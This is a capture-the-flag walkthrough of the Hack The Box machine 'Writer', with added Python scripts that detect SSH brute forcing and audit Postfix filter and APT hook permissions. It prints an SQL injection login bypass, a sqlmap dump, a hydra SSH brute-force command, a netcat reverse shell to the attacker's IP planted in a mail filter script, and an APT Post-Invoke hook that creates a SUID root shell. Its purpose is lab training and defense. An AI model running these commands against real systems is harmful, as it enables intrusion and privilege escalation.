Hack The Box: Writer

Prelude

Writer was an intermediate machine from Hack The Box, developed by TheCyberGeek.

This was a good learning experience, although the initial foothold, bruteforcing the SSH login of a user named kyle, was a bit too realistic.

Once we are inside the machine, we can see that the user belongs to some peculiar groups. By searching for files and directories owned by those groups, we find that the user can write to the disclaimer script run by Postfix's smtpd. We can abuse this permission to spawn a shell as the higher-privileged user named john.

With some basic enumeration, we find that john is also part of a custom group, and by following the files and directories owned by that group we find that john is able to write APT configuration files to the /etc/apt/apt.conf.d directory. We can then abuse this privilege to spawn a root shell!

Let’s start the exploitation.

Exploitation

Starting the exploitation with the usual Nmap scan.

nmap -sCV -v -oN tcp 10.10.11.101

And got the following result.

22/tcp  open  ssh         OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 98:20:b9:d0:52:1f:4e:10:3a:4a:93:7e:50:bc:b8:7d (RSA)
|   256 10:04:79:7a:29:74:db:28:f9:ff:af:68:df:f1:3f:34 (ECDSA)
|_  256 77:c4:86:9a:9f:33:4f:da:71:20:2c:e1:51:10:7e:8d (ED25519)
80/tcp  open  http        Apache httpd 2.4.41 ((Ubuntu))
| http-methods: 
|_  Supported Methods: OPTIONS HEAD GET
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Story Bank | Writer.HTB
139/tcp open  netbios-ssn Samba smbd 4.6.2
445/tcp open  netbios-ssn Samba smbd 4.6.2
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| nbstat: NetBIOS name: WRITER, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
|   WRITER<00>           Flags: <unique><active>
|   WRITER<03>           Flags: <unique><active>
|   WRITER<20>           Flags: <unique><active>
|   \x01\x02__MSBROWSE__\x02<01>  Flags: <group><active>
|   WORKGROUP<00>        Flags: <group><active>
|   WORKGROUP<1d>        Flags: <unique><active>
|_  WORKGROUP<1e>        Flags: <group><active>
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-09-03T08:02:49
|_  start_date: N/A

I started the enumeration with SMB and found some inaccessible SMB shares.

smbclient -L 10.10.11.101 -U '' -N

Then I decided to direct my enumeration to port 80. I navigated to http://10.10.11.101/ and found the following web page.

The first thing I noticed was that the pages had no file extensions; there were only directory paths.
Navigating to index.php or index.html did not work, but navigating to / did. This is a strong indication of a Python or Ruby web server.

I ran gobuster and found a directory named /administrative.

This login was bypassed by using the following payload as the username and password, on the URL http://10.10.11.101/dashboard.

admin@writer.htb' OR 1=1#

I have also found a way to upload files to the story edit section by spoofing the file format.

It was successfully uploaded to http://10.10.11.101/static/img/.

But, I couldn’t find a way to execute the uploaded file.

There was also a Blind SQL Injection vulnerability in the /administrative login page.

I used the following command to exfiltrate the username and password hash of user admin from database.

sqlmap -r burp/login.req --batch --dump --dbms=mysql -T users -C email,password,username

I tried to crack the hash, but failed.

Since it was a blind SQL injection, I decided to exfiltrate files from the server, namely /etc/apache2/apache2.conf. However, I gave up on the exfiltration because of the extremely slow responses from the server. I tried this for more than 6-7 hours and still couldn’t download the file. 😢

So, I’ve decided to change my focus from this vector.

Moving on…

I’ve diverted my focus to port 135 and connected to the port using rpcclient.

rpcclient -L 10.10.11.101 -U '' -N

Then I used the enumdomusers command to list users and found a user named Kyle.

Output of queryuser command on Kyle

Since this machine had SSH open, I decided to brute-force this user’s SSH login using hydra.

hydra -l 'kyle' -P /usr/share/wordlists/rockyou.txt ssh://10.10.11.101 -t 60

And after several minutes, the password was found to be marcoantonio.

I used this password to login to SSH as kyle.

And I got in!
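As an added defender’s-side example (my code, not part of the original writeup), the following script detects the trace this foothold leaves in sshd logs: many failed passwords from one source inside a short window, followed by a success once the wordlist hits. The log lines are constructed and the year is assumed.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sshd log excerpt (not taken from the box); year assumed to be 2021.
SAMPLE_LOG = """\
Sep  3 08:10:01 writer sshd[1201]: Failed password for kyle from 10.10.14.45 port 50122 ssh2
Sep  3 08:10:02 writer sshd[1202]: Failed password for kyle from 10.10.14.45 port 50124 ssh2
Sep  3 08:10:02 writer sshd[1203]: Failed password for invalid user admin from 10.10.14.45 port 50126 ssh2
Sep  3 08:10:03 writer sshd[1204]: Failed password for kyle from 10.10.14.45 port 50128 ssh2
Sep  3 08:10:03 writer sshd[1205]: Failed password for kyle from 10.10.14.45 port 50130 ssh2
Sep  3 08:10:04 writer sshd[1206]: Failed password for kyle from 10.10.14.45 port 50132 ssh2
Sep  3 08:15:40 writer sshd[1300]: Accepted password for kyle from 10.10.14.45 port 50900 ssh2
Sep  3 09:00:00 writer sshd[1400]: Failed password for kyle from 192.0.2.7 port 40000 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+ ssh2$"
)

def parse_line(line, year=2021):
    """Return (timestamp, result, user, ip) for a password auth line, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return ts, m["result"], m["user"], m["ip"]

def find_bruteforce(log_text, threshold=5, window_s=60):
    """Map each source IP with >= threshold failures inside any window_s-second
    window to its total failures and whether a login succeeded afterwards
    (the pattern a wordlist attack leaves when it finds the password)."""
    by_ip = defaultdict(list)
    for ev in filter(None, map(parse_line, log_text.splitlines())):
        by_ip[ev[3]].append(ev)
    alerts = {}
    for ip, evs in by_ip.items():
        evs.sort()
        fails = [ts for ts, result, _, _ in evs if result == "Failed"]
        best, j = 0, 0
        for i, ts in enumerate(fails):          # sliding window over failure times
            while (ts - fails[j]).total_seconds() > window_s:
                j += 1
            best = max(best, i - j + 1)
        if best >= threshold:
            success_after = any(r == "Accepted" and ts >= fails[0] for ts, r, _, _ in evs)
            alerts[ip] = {"failures": len(fails), "success_after": success_after}
    return alerts
```

Feeding it the constructed sample flags 10.10.14.45 with six failures and a later success, while the single failure from 192.0.2.7 stays below the threshold.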

Privilege Escalation #1

Once I was in as kyle, I found that kyle is a member of the groups smbgroup and filter.

I used the following command to list all files and directories owned by the group filter.

find / -group filter 2>/dev/null

The file /var/spool/disclaimer was a bash script that uses a tool called altermime to automatically attach a disclaimer text, which is defined in a text file called disclaimer.txt.
The sender addresses for which alterMIME should add the disclaimer are listed in a file called disclaimer_addresses.


I then checked for listening ports on the machine with ss -tulnp and found that port 25 was open, listening for local connections only.

I also found an excellent article in Viperone’s gitbook about exploiting the Postfix disclaimer script to escalate privileges. Now we need to find the contents of disclaimer_addresses so that we can exploit this.

The disclaimer_addresses file contained the following addresses.

Then I replaced the script with the following netcat reverse shell payload.

echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 10.10.14.45 9001 >/tmp/f' > disclaimer

Then I forwarded port 25 of writer.htb to my local port 8025 using SSH and used telnet to connect to it.

Then I sent an email from root@writer.htb to kyle@writer.htb using the following SMTP dialogue.

helo test
MAIL FROM: root@writer.htb
RCPT TO: kyle@writer.htb
DATA
test
.

The line containing only a . (dot) terminates the DATA section, and the mail is sent.

Since the address root@writer.htb is in the disclaimer_addresses file, smtpd will execute the disclaimer script and we’ll get a shell back!

And I got a shell back as John!

Awesome!
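From the defender’s side, the weakness here is a Postfix pipe filter whose script can be edited by someone other than the user it runs as. The following added example (mine, not the author’s or the box’s code) parses a master.cf excerpt for pipe(8) services and flags any filter script that is group- or world-writable. The master.cf excerpt, service name and script contents are constructed assumptions modelled on that setup.

```python
import os
import re
import stat
import tempfile

# Constructed master.cf excerpt modelled on a Postfix pipe-based content filter; the
# service name, user and script path are assumptions, not copied from the box.
SAMPLE_MASTER_CF = """\
smtp      inet  n       -       y       -       -       smtpd
  -o content_filter=dfilt:
dfilt     unix  -       n       n       -       -       pipe
  flags=Rq user=john argv=/var/spool/disclaimer -f ${sender} -- ${recipient}
"""

def parse_pipe_services(master_cf_text):
    """Yield (service, user, script) for each pipe(8) service, joining continuation lines."""
    entries = []
    for line in master_cf_text.splitlines():
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        if line[0].isspace() and entries:      # indented line continues the previous entry
            entries[-1] += " " + line.strip()
        else:
            entries.append(line.strip())
    for entry in entries:
        fields = entry.split()                 # 8th column is the command (pipe, smtpd, ...)
        if len(fields) > 7 and fields[7] == "pipe":
            user = re.search(r"\buser=([^\s:]+)", entry)
            argv = re.search(r"\bargv=(\S+)", entry)
            yield fields[0], user.group(1) if user else "postfix", argv.group(1) if argv else None

def audit_filters(master_cf_text):
    """Flag pipe filters whose script is group- or world-writable: whoever can edit
    it runs code as the filter's user (john on this box) on every matching mail."""
    findings = []
    for service, user, script in parse_pipe_services(master_cf_text):
        if script and os.path.exists(script):
            mode = os.stat(script).st_mode
            if mode & (stat.S_IWGRP | stat.S_IWOTH):
                findings.append((service, user, script, oct(mode & 0o7777)))
    return findings

def demo_audit():
    """Offline run against a constructed filter script left group-writable."""
    script = os.path.join(tempfile.mkdtemp(), "disclaimer")
    with open(script, "w") as fh:
        fh.write("#!/bin/bash\n# constructed stand-in for the altermime wrapper\n")
    os.chmod(script, 0o775)
    return audit_filters(SAMPLE_MASTER_CF.replace("/var/spool/disclaimer", script))
```

On a real host, pass the contents of /etc/postfix/master.cf to audit_filters; an empty result means every pipe filter script is writable only by its owner.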

Privilege Escalation #2

Just like kyle, user John also had some unusual group membership.

John was a member of the group named management, which I found using the groups command. I then repeated the earlier search.

find / -group management 2>/dev/null

I found that the directory /etc/apt/apt.conf.d was owned by the group management. This is a drop-in configuration directory for the APT package manager: files placed here are loaded by apt every time it runs.

With a little research, I found a way to get code execution by placing a malicious apt configuration file in that directory.

Combining this information, I created the file /etc/apt/apt.conf.d/11test.conf with the following contents. The command runs after apt update finishes executing; the payload makes a copy of the bash binary in /tmp with the SUID bit set.

APT::Update::Post-Invoke {"cp /bin/bash /tmp;chmod 4755 /tmp/bash; touch /tmp/list";};

I then ran apt changelog apt to view the changelog of apt.

I used apt changelog because the user john could not run apt update directly; apt changelog triggers an apt update internally, so the payload is executed once that update finishes.

This step was extremely finicky for me: I had to repeatedly change the package name passed to apt changelog (alternating between nano and apt; I am still not sure whether this was necessary or a placebo), and my apt config file was being deleted automatically every minute or two.

I’ve used these changelog commands to trigger the payload.

apt changelog apt
apt changelog nano

Gaining root in this machine was a game of repeatedly saving the config file and calling apt changelog command.

But with some tinkering the bash binary was copied to /tmp, and I used /tmp/bash -p to spawn a root bash shell on the machine.
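Added here as a defender’s check (my example, not the author’s or the box’s code): it audits an apt.conf.d directory for the two conditions this escalation needs, a directory or fragment writable by a non-root group or by everyone, and Pre/Post-Invoke hook commands, so that a fragment like 11test.conf stands out next to the legitimate hooks. The sample directory it builds is constructed for offline use; the directive list comes from apt.conf(5).

```python
import os
import re
import stat
import tempfile

# apt.conf(5) directives whose values are shell commands run by apt or dpkg.
HOOK_RE = re.compile(
    r"((?:APT::Update|DPkg)::(?:Pre|Post)-Invoke(?:-Success)?|DPkg::Pre-Install-Pkgs)"
    r"\s*\{([^}]*)\}"
)

def weak_perms(path):
    """True when a non-root group or everyone may write path (Writer's apt.conf.d case)."""
    st = os.stat(path)
    group_w = bool(st.st_mode & stat.S_IWGRP) and st.st_gid != 0
    return group_w or bool(st.st_mode & stat.S_IWOTH)

def audit_apt_conf(conf_dir="/etc/apt/apt.conf.d"):
    """Return (kind, path, detail) findings: writable dir/fragments plus every hook
    command, so each hook can be checked against the packages expected to install one."""
    findings = []
    if weak_perms(conf_dir):
        findings.append(("dir-writable", conf_dir, oct(os.stat(conf_dir).st_mode & 0o7777)))
    for name in sorted(os.listdir(conf_dir)):
        path = os.path.join(conf_dir, name)
        if not os.path.isfile(path):
            continue
        if weak_perms(path):
            findings.append(("file-writable", path, oct(os.stat(path).st_mode & 0o7777)))
        with open(path, errors="replace") as fh:
            text = fh.read()
        for directive, body in HOOK_RE.findall(text):
            for cmd in re.findall(r'"([^"]*)"', body):   # each quoted string is one command
                findings.append(("hook", path, f"{directive}: {cmd}"))
    return findings

def build_sample_dir():
    """Constructed apt.conf.d look-alike (not from the box): a normal update-stamp
    hook beside a fragment shaped like the 11test.conf used in this writeup."""
    d = tempfile.mkdtemp()
    benign = os.path.join(d, "15update-stamp")
    with open(benign, "w") as fh:
        fh.write('APT::Update::Post-Invoke-Success {"touch /var/lib/apt/periodic/update-success-stamp 2>/dev/null || true";};\n')
    os.chmod(benign, 0o644)
    rogue = os.path.join(d, "11test.conf")
    with open(rogue, "w") as fh:
        fh.write('APT::Update::Post-Invoke {"cp /bin/bash /tmp;chmod 4755 /tmp/bash; touch /tmp/list";};\n')
    os.chmod(rogue, 0o666)  # left group/world-writable, as a non-root editor might
    return d
```

Running audit_apt_conf() with no argument on a real host lists every hook in /etc/apt/apt.conf.d; both the stock update-stamp hook and a rogue one are reported, and the permission findings tell them apart.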

Postlude

And that was Writer!

This was a very finicky box and wasn’t a pleasant experience for me at all! But in the end I learned some new tricks.

Kudos to TheCyberGeek for this machine!

Peace out! ✌️
